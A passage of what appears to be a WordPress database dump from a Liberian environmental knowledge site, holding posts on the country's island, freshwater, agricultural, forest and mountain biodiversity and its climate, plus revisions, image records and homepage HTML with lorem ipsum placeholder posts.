Lake Piso. There are other islands in the country that have not been identified.\r\n\r\nAn island in the country that much is written about in Liberia‘s history is Providence Island, actually a very small island, where the American Colonization Society landed the first batch of slaves in 1816. Another island of touristic importance is Marshall, located at the site of the Marshall Wetlands that are of international importance. Other islands reported by local people but not popularly known are Dead Island in Maryland County, Dubli Island in Bong County and Tindual Island in Gbarpolu County. Because most of these island ecosystems have received little or no research attention , very little or nothing is known about their size, location, the types of plants and animals inhabiting them and a host of other important information that could inform their status as far as threats to their existence, among others.','Island Biodiversity','Liberia‘s island ecosystems are relatively small in size. They however do have key characteristics that distinguish them from other ecosystems because of their dual nature: terrestrial-aquatic characteristics.','publish','closed','closed','','island-biodiversity','','','2020-11-09 10:00:02','2020-11-09 10:00:02','',0,'https://ekmsliberia.info/?post_type=related_topic&#038;p=469',19,'related_topic','',0),(470,1,'2019-11-09 12:37:09','2019-11-09 12:37:09','Liberia possesses abundant surface water and six principal rivers (including Cavalla, Cestos, Lofa, Mano, Saint John and St Paul). Together, these river basins drain approximately 65.5% of the country. The Mano and Cavalla rivers are shared basins between Sierra Leone and Cote d‘Ivoire respectively, while the Lofa, Saint John and Saint Paul drain part of Guinea. Numerous micro watersheds or sub-watersheds also exist. The major rivers flow in a northeast to southwest direction due to topographical conditions en route to the Atlantic Ocean (UNEP/NESDA, 2002). Major exceptions to these patterns are the middle reaches of the Cavalla and Dugbe Rivers in eastern Liberia, which flow parallel to the coast in their lower reaches before entering the Atlantic Ocean.\r\n\r\nThese ecosystems differ from the coastal/ marine ecosystems in that they do not contain salt, that‘s why they are sometimes referred to as freshwater. In Liberia, these ecosystems are habitats for various species of reptiles, amphibians, fish, mollusks, worms, protozoa and other fauna species that cannot adapt to salinity environments. Three basic kinds of freshwater ecosystems exist in the country. They are (i) Slow-flowing or still water (such as pools, ponds and lakes); (ii) Fast-flowing water (such as streams and rivers); and (III) Stagnant and inundated/saturated inland wetlands (such as marshland, swamp, and ground water) in which the soil is flooded temporarily or drenched either temporarily or permanently throughout the year.\r\n\r\nMost rural communities benefit directly or indirectly from freshwater ecosystems for various services including provision of drinking water, water for irrigation, water for other home uses and water for food production/processing. Freshwater ecosystems also provide services such as hydroelectric power generation, water purification and waste removal, nutrient cycling, transportation, recreation, flood control and climate regulation. Inland wetland landscapes are very important for food production, especially in communities where fertile terrestrial soils have become infertile due to overuse and mismanagement. Inland swamps are particularly used for rice cultivation, referred to as paddy farming. Threats to Liberia‘s inland wetlands include but not limited to poisoning of water bodies to kill fish, gold and diamond mining (some gold miners reportedly use mercury which is poisonous to animals including man himself).\r\n\r\nMore studies on inland wetlands and fresh water are urgent in Liberia, especially to determine the conservation values of the biodiversity they contain and water quality in terms of salinity (which is also a determining factor in the kinds of species found in saturated habitat) . It is also important for determining the degree of salinity in estuaries or lagoons to determine their status as fresh, intermediate or brackish water. Many freshwater organisms are intolerant of salt, so such information can help which organisms habilitate in different places. Additionally, such information on freshwater is important for human health since freshwater is used for drinking in many rural communities. As of 2002, a total of eight (8) wetlands had been identified for conservation actions. They are Lake Piso, Marshall, Mesurado, Lake Shepherd, Bafu Bay, Cestos-Senkwehn, Gbedin, and Kpatawee. Some of these lakes have waterfalls, Kpatawee, for example.\r\n\r\nIdentification of the types of wetland and their associated species composition was done more than twenty (20) years ago and these needs to be updated. The four (4) wetland types that have so far been identified are inland riverine, inland swamp, and coastal and coastal lacustrine. After the NBSAP 2004 process, some rapid assessments of wetlands were carried out under the RAMSAR Convention which supported the designation of five (5) RAMSAR sites in Liberia. In order to sustain and consolidate the management and governance of these areas, there is a need to upgrade the status of these wetlands and to complete the National Wetlands Policy and put it into action. The ecosystems with which these wetlands are associated include the Atlantic Ocean, beaches, lakes, mangrove forests, estuaries, salt marshes, lagoons, bays, creeks, etc., and are distributed in the nine coastal counties of Liberia (i.e. Grand Cape Mount, Bomi, Montserrado,Margibi, Grand Bassa, RiverCess, Sinoe, Grand Kru and Maryland).','Inland Waters Biodiversity','Liberia possesses abundant surface water and six principal rivers (including Cavalla, Cestos, Lofa, Mano, Saint John and St Paul).','publish','closed','closed','','inland-waters-biodiversity','','','2019-11-25 20:39:17','2019-11-25 20:39:17','',0,'https://ekmsliberia.info/?post_type=related_topic&#038;p=470',18,'related_topic','',0),(471,1,'2019-11-09 12:58:54','2019-11-09 12:58:54','These agricultural ecosystems could have entirely been considered as a part of terrestrial ecosystems but this is not possible because of their dual ecosystem characteristics. In these particular types of agricultural ecosystems, both terrestrial upland crop and cattle production on one hand and aquaculture fishery production on the other, are possible. The topographic features of Liberia‘s landscape directly or otherwise influences soil characteristics and this has implications on the quality of soils hence on agricultural productivity.\r\n\r\nMost agricultural activities take place in the northern and central parts of the country, especially in areas with rolling hills and northern highlands. Here rice and vegetables grow well. Oil palm development is taking place in the region between the coastal plain and the rolling hills.\r\n\r\n<strong>Biodiversity in agricultural systems:</strong> The agro-ecosystem of Liberia contains four major zones – (i) The coastal plains; (ii) Hilly zone ;(iii) Mountain and plateau zone; and (iv) The northern highland zone. The agriculture biodiversity of the nation encompasses rich flora and fauna population which is characterized by domesticated plant and animal species, soil micro – organisms, pollinators, pests, wild relatives of domesticated crops and animals as well as plant and animal genetic materials including varieties, hybrids and different types of germplasm. In 2004 the major crops grown were rice, cassava, maize, oil palm, cocoa, coffee, rubber and sugar cane. The Asian rice species (Oryza sativa) and the African species (Oryza glaberrima) are the two rice species grown. Oryza glaberrima is nowadays rare. Twenty-two aquatic varieties (19 exotic and 3 indigenous) and thirty-two terrestrial (25 exotic and 7 indigenous) are available. Nearly all the exotic varieties were brought from the West African Rice Development Association (WARDA). About 90% of the locally produced rice is grown in the upland in lithosols which account for 75% of Liberia‘s total landscape (Larbi 2010).The four major groups of soils in Liberia and the most productive type among them are discussed under ―Traditional agriculture production system (Section 4.4.2).\r\n\r\nLivestock production in Liberia has always been the least prioritized as compared to crops. The industry plays a minimal role in Liberian agriculture. The Ministry of Agriculture reported in 2013 that animal rearing in Liberia is still not well institutionalized. Most of the livestock and poultry enumerated during the period under review were produced in the backyards of the traditional farmers. The modern segment comprises a number of firms, prominent among which are the Firestone Plantations Company, Cavalla Rubber Corporation, Liberia Agricultural Company, Cocopa Rubber Corporation, Weala Rubber Corporation, which employ huge labor. Currently, the modern sector is expanded to include both rubber and oil palm monocultures. Weala is merged with German Camp to have what is now Sallala Rubber Corporation. Others include Sime Darby, GoldernVeroleum, Equatorial Biofuels and the Sifca Group.','Agricultural Biodiversity','These agricultural ecosystems could have entirely been considered as a part of terrestrial ecosystems but this is not possible because of their dual ecosystem characteristics.','publish','closed','closed','','agricultural-biodiversity','','','2019-11-26 00:02:14','2019-11-26 00:02:14','',0,'https://ekmsliberia.info/?post_type=related_theme&#038;p=471',17,'related_topic','',0),(472,1,'2019-11-09 13:00:09','2019-11-09 13:00:09','','Dry and Sub-humid land Biodiversity','','publish','closed','closed','','dry-and-sub-humid-land-biodiversity','','','2020-11-11 12:52:33','2020-11-11 12:52:33','',0,'https://ekmsliberia.info/?post_type=related_theme&#038;p=472',16,'related_topic','',0),(473,1,'2019-11-09 13:02:45','2019-11-09 13:02:45','Liberia is recognized globally as a top conservation priority in the West African region, as it has significantly high levels of species endemic and accounts for 42% of West Africa‘s remaining Upper Guinean Forest, a humid coastal rainforest belt and a global Biodiversity Hotspot that stretches across the other West African countries of Cote d‘Ivoire, Ghana, Sierra Leone and Togo.\r\n\r\nLiberia‘s forest ecosystems harbour the highest populations of elephants in the region and are a home of over 225 timber tree species, 2000 flowering plant species, 140 mammal species, 600 bird species, 75 amphibian and reptile species and over 1000 species of identified insects which must be conserved, utilized equitably and managed sustainably. There remains a countless number of animals, plants and other organisms of Liberia‘s resource rich and diversified ecosystems which science has yet to discover.\r\n\r\nHowever, in the last 3 decades, more than any other time in Liberia‘s history, poorly regulated human activities have significantly degraded most of the ecosystems of note, resulting in an unprecedented loss of biodiversity. Taking one ecosystem for an example, it is approximated that over 60% of the country‘s forested landscapes is degraded and this must have resulted in the extinction of hundreds of thousands of animals, plants and other organisms. Sustained action towards a responsible and credible governance and sustainable management and use of Liberia‘s critical natural resource base is the single most important challenge the country faces and meeting this challenge must begin with addressing the causes of the loss of biodiversity of the various ecosystems.\r\n\r\nAs a testimony of her seriousness of purpose to meet the challenge in point, the Liberian Government signed the Convention on Biological Diversity (CBD) in the year 2000 and in 2002, prepared the first draft of a National Biodiversity Strategy &amp; Action Plan (NBSAP) that underscored the significance attached to the intrinsic and extrinsic values of biological resources.','Forest Biodiversity','Liberia is recognized globally as a top conservation priority in the West African region, as it has significantly high levels of species endemic and accounts for 42% of West Africa‘s remaining Upper Guinean Forest, a humid coastal rainforest belt and a global Biodiversity Hotspot that stretches across the other West African countries of Cote d‘Ivoire, Ghana, Sierra Leone and Togo.','publish','closed','closed','','forest-biodiversity','','','2019-11-25 20:39:17','2019-11-25 20:39:17','',0,'https://ekmsliberia.info/?post_type=related_theme&#038;p=473',15,'related_topic','',0),(474,1,'2019-11-09 13:05:36','2019-11-09 13:05:36','Liberia is located on the west coast of Africa, (latitude 6.4280548 and longitude -9.4294987) and occupies a land area of approximately 111 370 km2 of which 96 160 km2 (86 percent) is dry land. The rest, 15 210 km2 and constituting 14 percent of the surface area, is covered by water. It shares borders with Guinea to the north, Côte d’Ivoire to the northeast and east, Sierra Leone to the northwest and the Atlantic Ocean to the south and southwest, with a coastline of about 520 km in length.\r\n\r\nThe climate of Liberia can be summarized as follows: rainfall ranges from about 1 700 mm in the north to &gt; 4 500 mm in the south; temperature 24–28 ℃ relative humidity 65–&gt; 80 percent; sunshine duration 2–8 hours/day; evapotranspiration 3.0–4.5 mm/day. The wind conditions are described as generally mild. The topography comprises mainly flat to rolling coastal plains running into some interior plateaus and then mountains in the northeastern part of the country. The country is made up of four physiographical units: coastal plains (0-100 m), interior hills (100–300 m), interior plateaus (300–600m) and the mountainous areas (&gt; 600m). The country has nine major river systems, all of which are perennial, and run in a northeast to southwest direction into the Atlantic Ocean, draining about 66 percent of the country and taking their sources from neighbouring Sierra Leone, Guinea or Côte d’Ivoire. There are also short coastal water courses, draining about 3 percent of the country. The total renewable water resource is estimated at approximately 232 km3/year, making Liberia one of the African countries with the highest per capita renewable water resources, about 71 000 m3/year.','Land and Climate','Liberia is located on the west coast of Africa, (latitude 6.4280548 and longitude -9.4294987) and occupies a land area of approximately 111 370 km2 of which 96 160 km2 (86 percent) is dry land.','publish','closed','closed','','land-and-climate','','','2019-11-25 20:38:48','2019-11-25 20:38:48','',0,'https://ekmsliberia.info/?post_type=related_theme&#038;p=474',14,'related_topic','',0),(475,1,'2019-11-09 13:16:58','2019-11-09 13:16:58','Liberia is located on the west coast of Africa, (latitude 6.4280548 and longitude -9.4294987) and occupies a land area of approximately 111 370 km2 of which 96 160 km2 (86 percent) is dry land. The rest, 15 210 km2 and constituting 14 percent of the surface area, is covered by water. It shares borders with Guinea to the north, Côte d’Ivoire to the northeast and east, Sierra Leone to the northwest and the Atlantic Ocean to the south and southwest, with a coastline of about 520 km in length.\n\nThe climate of Liberia can be summarized as follows: rainfall ranges from about 1 700 mm in the north to &gt; 4 500 mm in the south; temperature 24–28 ℃ relative humidity 65–&gt; 80 percent; sunshine duration 2–8 hours/day; evapotranspiration 3.0–4.5 mm/day. The wind conditions are described as generally mild. The topography comprises mainly flat to rolling coastal plains running into some interior plateaus and then mountains in the northeastern part of the country. The country is made up of four physiographical units: coastal plains (0-100 m), interior hills (100–300 m), interior plateaus (300–600m) and the mountainous areas (&gt; 600m). The country has nine major river systems, all of which are perennial, and run in a northeast to southwest direction into the Atlantic Ocean, draining about 66 percent of the country and taking their sources from neighbouring Sierra Leone, Guinea or Côte d’Ivoire. There are also short coastal water courses, draining about 3 percent of the country. The total renewable water resource is estimated at approximately 232 km3/year, making Liberia one of the African countries with the highest per capita renewable water resources, about 71 000 m3/year.','Land and Climate','Liberia is located on the west coast of Africa, (latitude 6.4280548 and longitude -9.4294987) and occupies a land area of approximately 111 370 km2 of which 96 160 km2 (86 percent) is dry land.','inherit','closed','closed','','474-autosave-v1','','','2019-11-09 13:16:58','2019-11-09 13:16:58','',474,'https://ekmsliberia.info/474-autosave-v1/',0,'revision','',0),(476,1,'2019-11-09 13:19:19','2019-11-09 13:19:19','','Land and Sustainable Development Goals','','publish','closed','closed','','land-and-sustainable-development-goals','','','2020-11-09 14:12:14','2020-11-09 14:12:14','',0,'https://ekmsliberia.info/?post_type=related_theme&#038;p=476',13,'related_topic','',0),(477,1,'2019-11-09 13:20:18','2019-11-09 13:20:18','Coming up','Land Degradation and Drought','','publish','closed','closed','','land-and-drought','','','2019-11-25 20:38:48','2019-11-25 20:38:48','',0,'https://ekmsliberia.info/?post_type=related_theme&#038;p=477',12,'related_topic','',0),(478,1,'2019-11-09 13:21:25','2019-11-09 13:21:25','','Land and Human Security','','publish','closed','closed','','land-and-human-security','','','2020-11-09 14:29:15','2020-11-09 14:29:15','',0,'https://ekmsliberia.info/?post_type=related_theme&#038;p=478',11,'related_topic','',0),(479,1,'2019-11-09 13:24:16','2019-11-09 13:24:16','','Action on Climate and Sustainable Development Goals','','publish','closed','closed','','action-on-climate-and-sustainable-development-goals','','','2020-11-11 12:43:38','2020-11-11 12:43:38','',0,'https://ekmsliberia.info/?post_type=related_theme&#038;p=479',10,'related_topic','',0),(480,1,'2019-11-09 13:25:04','2019-11-09 13:25:04','','Adaptation and Resilience','','publish','closed','closed','','adaptation-and-resilience','','','2019-11-26 00:05:06','2019-11-26 00:05:06','',0,'https://ekmsliberia.info/?post_type=related_theme&#038;p=480',9,'related_topic','',0),(481,1,'2019-11-09 13:25:53','2019-11-09 13:25:53','','Capacity Building','','publish','closed','closed','','capacity-building','','','2019-11-25 20:38:03','2019-11-25 20:38:03','',0,'https://ekmsliberia.info/?post_type=related_theme&#038;p=481',8,'related_topic','',0),(482,1,'2019-11-09 13:27:52','2019-11-09 13:27:52','Coming up','Climate Finance','','publish','closed','closed','','climate-finance','','','2019-11-25 20:38:03','2019-11-25 20:38:03','',0,'https://ekmsliberia.info/?post_type=related_theme&#038;p=482',7,'related_topic','',0),(483,1,'2019-11-09 13:28:23','2019-11-09 13:28:23','Coming up','Climate Technology','','publish','closed','closed','','climate-technology','','','2020-11-11 12:29:37','2020-11-11 12:29:37','',0,'https://ekmsliberia.info/?post_type=related_theme&#038;p=483',6,'related_topic','',0),(484,1,'2019-11-09 13:31:11','2019-11-09 13:31:11','Coming up','Education and Youth','','publish','closed','closed','','education-and-youth','','','2019-11-25 20:38:03','2019-11-25 20:38:03','',0,'https://ekmsliberia.info/?post_type=related_theme&#038;p=484',5,'related_topic','',0),(485,1,'2019-11-09 13:31:52','2019-11-09 13:31:52','Coming up','Gender','','publish','closed','closed','','gender','','','2019-11-25 20:38:03','2019-11-25 20:38:03','',0,'https://ekmsliberia.info/?post_type=related_theme&#038;p=485',4,'related_topic','',0),(486,1,'2019-11-09 13:32:54','2019-11-09 13:32:54','Coming up','Land Use','','publish','closed','closed','','land-use','','','2019-11-25 20:38:03','2019-11-25 20:38:03','',0,'https://ekmsliberia.info/?post_type=related_theme&#038;p=486',3,'related_topic','',0),(487,1,'2019-11-09 13:35:53','2019-11-09 13:35:53','','Local Communities and Indigenous People','','publish','closed','closed','','local-communities-and-indigenous-people','','','2019-11-25 20:38:03','2019-11-25 20:38:03','',0,'https://ekmsliberia.info/?post_type=related_theme&#038;p=487',2,'related_topic','',0),(488,1,'2019-11-09 13:36:53','2019-11-09 13:36:53','Coming up','Mitigation','','publish','closed','closed','','mitigation','','','2019-11-25 20:38:03','2019-11-25 20:38:03','',0,'https://ekmsliberia.info/?post_type=related_theme&#038;p=488',1,'related_topic','',0),(489,1,'2019-11-09 14:20:02','2019-11-09 14:20:02','Mountains ecosystems are actually associated with the terrestrial ecosystems because they are found on highlands. They provide an array of habitats where a large number of animals and plants can be found. Like other ecosystems such as those described above, the mountain ecosystems host plant and animal species that can adapt to the influence of elevation and climate of the area.\n\nMountain ecosystems are home to a wide variety of animals and plants species. The ecological richness and beautiful features of Liberia‘s mountain landscapes make for attractive tourist destinations. Unfortunately, the tourism sector of Liberia is still underdeveloped and so is unable to utilize the opportunities which these mountain ecosystems provide.\n\nThe mountains and mountain ranges identified in Liberia are Nimba, Wologisi, Bong Range, Gibi, Putu, Bomi, Wutivi, Mano, Bea, Kpo Range, and Wenegissi (Ref: Liberia National Biodiversity Strategy and Action Plan 2017-2025). It must be noted here, though, that four of these mountains and mountain ranges –Bong Range, Gibi Mountain, Kpo Range, Bomi Mountain, have been exploited for iron ore. Meanwhile, ArcelorMittal, a multinational mining giant , has gathered more information about the various species of birds of which the mountains of the Nimba Range serve as habitat.Previously, the total species list for the Nimba Range stood at 413. Because of the research on birds that AML had supported, the current list of birds of the Nimba Range is now 615 (AML 2010).','Mountain Biodiversity','','inherit','closed','closed','','467-autosave-v1','','','2019-11-09 14:20:02','2019-11-09 14:20:02','',467,'https://ekmsliberia.info/467-autosave-v1/',0,'revision','',0),(490,1,'2019-11-09 14:23:43','2019-11-09 14:23:43','Liberia‘s island ecosystems are relatively small in size. They however do have key characteristics that distinguish them from other ecosystems because of their dual nature: terrestrial-aquatic characteristics. They are actually terrestrial in nature but surrounded by aquatic environment. Those that are well-known because of their historical significance are Providence and Bushrod Islands in Montserrado and Wetlands and Massa (Massatin) Island in Lake Piso. There are other islands in the country that have not been identified.\n\nAn island in the country that much is written about in Liberia‘s history is Providence Island, actually a very small island, where the American Colonization Society landed the first batch of slaves in 1816. Another island of touristic importance is Marshall, located at the site of the Marshall Wetlands that are of international importance. Other islands reported by local people but not popularly known are Dead Island in Maryland County, Dubli Island in Bong County and ','Island Biodiversity','','inherit','closed','closed','','469-autosave-v1','','','2019-11-09 14:23:43','2019-11-09 14:23:43','',469,'https://ekmsliberia.info/469-autosave-v1/',0,'revision','',0),(491,1,'2019-11-09 14:32:04','2019-11-09 14:32:04','These agricultural ecosystems could have entirely been considered as a part of terrestrial ecosystems but this is not possible because of their dual ecosystem characteristics. In these particular types of agricultural ecosystems, both terrestrial upland crop and cattle production on one hand and aquaculture fishery production on the other, are possible. The topographic features of Liberia‘s landscape directly or otherwise influences soil characteristics and this has implications on the quality of soils hence on agricultural productivity.\n\nMost agricultural activities take place in the northern and central parts of the country, especially in areas with rolling hills and northern highlands. Here rice and vegetables grow well. Oil palm development is taking place in the region between the coastal plain and the rolling hills.\n\n<strong>Biodiversity in agricultural systems:</strong> The agro-ecosystem of Liberia contains four major zones – (i) The coastal plains; (ii) Hilly zone ;(iii) Mountain and plateau zone; and (iv) The northern highland zone. The agriculture biodiversity of the nation encompasses rich flora and fauna population which is characterized by domesticated plant and animal species, soil micro – organisms, pollinators, pests, wild relatives of domesticated crops and animals as well as plant and animal genetic materials including varieties, hybrids and different types of germplasm. In 2004 the major crops grown were rice, cassava, maize, oil palm, cocoa, coffee, rubber and sugar cane. The Asian rice species (Oryza sativa) and the African species (Oryza glaberrima) are the two rice species grown. Oryza glaberrima is nowadays rare. Twenty-two aquatic varieties (19 exotic and 3 indigenous) and thirty-two terrestrial (25 exotic and 7 indigenous) are available. Nearly all the exotic varieties were brought from the West African Rice Development Association (WARDA). About 90% of the locally produced rice is grown in the upland in lithosols which account for 75% of Liberia‘s total landscape (Larbi 2010).The four major groups of soils in Liberia and the most productive type among them are discussed under ―Traditional agriculture production system‖(Section 4.4.2).\n\nLivestock production in Liberia has always been the least prioritized as compared to crops. The industry plays a minimal role in Liberian agriculture. The Ministry of Agriculture reported in 2013 that animal rearing in Liberia is still not well institutionalized. Most of the livestock and poultry enumerated during the period under reviewwere produced in the backyards of the traditional farmers. The modern segment comprises a number of firms, prominent among which are the Firestone Plantations Company, Cavalla Rubber Corporation, Liberia Agricultural Company, Cocopa Rubber Corporation, Weala Rubber Corporation, which employ huge labor. Currently, the modern sector is expanded to include both rubber and oil palm monocultures. Weala is merged with German Camp to have what is now Sallala Rubber Corporation. Others include Sime Darby, GoldernVeroleum, Equatorial Biofuels and the Sifca Group.','Agricultural Biodiversity','These agricultural ecosystems could have entirely been considered as a part of terrestrial ecosystems but this is not possible because of their dual ecosystem characteristics.','inherit','closed','closed','','471-autosave-v1','','','2019-11-09 14:32:04','2019-11-09 14:32:04','',471,'https://ekmsliberia.info/471-autosave-v1/',0,'revision','',0),(492,1,'2019-11-09 14:45:46','2019-11-09 14:45:46','','featured_marine_coastal','Photo credit: Trokon Saykpa','inherit','open','closed','','featured_marine_coastal','','','2019-11-09 14:46:19','2019-11-09 14:46:19','',468,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine_coastal.jpg',0,'attachment','image/jpeg',0),(493,1,'2019-11-09 14:47:02','2019-11-09 14:47:02','','featured_land_climate','Photo Credit: Trokon Saykpa','inherit','open','closed','','featured_land_climate','','','2019-11-09 14:47:19','2019-11-09 14:47:19','',474,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_land_climate.jpg',0,'attachment','image/jpeg',0),(494,1,'2019-11-09 14:48:19','2019-11-09 14:48:19','','featured_inland_waters','Photo Credit: Trokon Saykpa','inherit','open','closed','','featured_inland_waters','','','2019-11-09 14:48:34','2019-11-09 14:48:34','',470,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_inland_waters.jpg',0,'attachment','image/jpeg',0),(495,1,'2019-11-09 14:49:19','2019-11-09 14:49:19','','featured_local_communities','Photo Credit: Trokon Saykpa','inherit','open','closed','','featured_local_communities','','','2019-11-09 14:49:37','2019-11-09 14:49:37','',487,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_local_communities.jpg',0,'attachment','image/jpeg',0),(496,1,'2019-11-09 14:57:15','2019-11-09 14:57:15','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h2>Latest from blog</h2>		\n		<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed</p>		\n									<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg\" alt=\"Lorem ipsum dolor sit amet consectetur\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">Lorem ipsum dolor sit amet consectetur</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg\" alt=\"Cras metus sed aliquet risus a tortor odio\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">Cras metus sed aliquet risus a tortor odio</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg\" alt=\"Quis ligula lacinia aliquet mauris ipsum\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">Quis ligula lacinia aliquet mauris ipsum</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg\" alt=\"Pellentesque nibh aenean in scelerisque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">Pellentesque nibh aenean in scelerisque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg\" alt=\"Nulla metus metus ullamcorper vel tincidunt\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-768x424.jpg 768w, 